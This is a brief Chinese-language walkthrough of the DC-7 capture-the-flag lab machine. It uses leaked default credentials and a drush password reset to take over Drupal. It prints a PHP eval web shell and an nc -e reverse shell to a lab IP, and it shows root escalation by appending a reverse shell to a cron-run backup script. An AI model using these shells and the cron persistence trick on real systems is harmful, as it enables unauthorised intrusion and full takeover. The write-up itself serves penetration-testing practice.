DC-7

Arp-scan -l

查到ip地址为192.168.213.159

信息收集:webscan\dirscan\whatweb

23

4

找到作者

5

查看作者github

6

这里发现默认账号密码,ssh连接

7

现在就是想办法提权

这次学到一个新东西

在home目录下,发现一个计划任务,有

8

drush命令,drush命令可以更改密码,在/var/www/html目录下运行drush命令,可以更改admin的密码。

$ drush cr 清理各种缓存

$ drush pm-enable 安装module

$ drush pm-uninstall 卸载module

$ drush pm-list 显示所有modules and themes列表

$ drush user-password admin –password=”123456” 更改密码

9

这个时候就能登录网站了

在网站内部翻找,看到一个文件上传点,但是不能解析成php

但是有插件,可以通过下载的插件解析php

10

下载地址https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

11

12在这里勾选安装

这时候就可以运行php代码了

13

<?php

@eval($_REQUESTS[“cmd”]);

?>

反弹shell到kali

Nc -e /bin/sh 192.168.213.137 5555

拿到交互式shell

然后把反弹root的shell写入计划任务中

echo “nc -e /bin/bash 192.168.213.137 6666” >> /opt/scripts/backups.sh

然后等着计划任务自动进行,就能有root的权限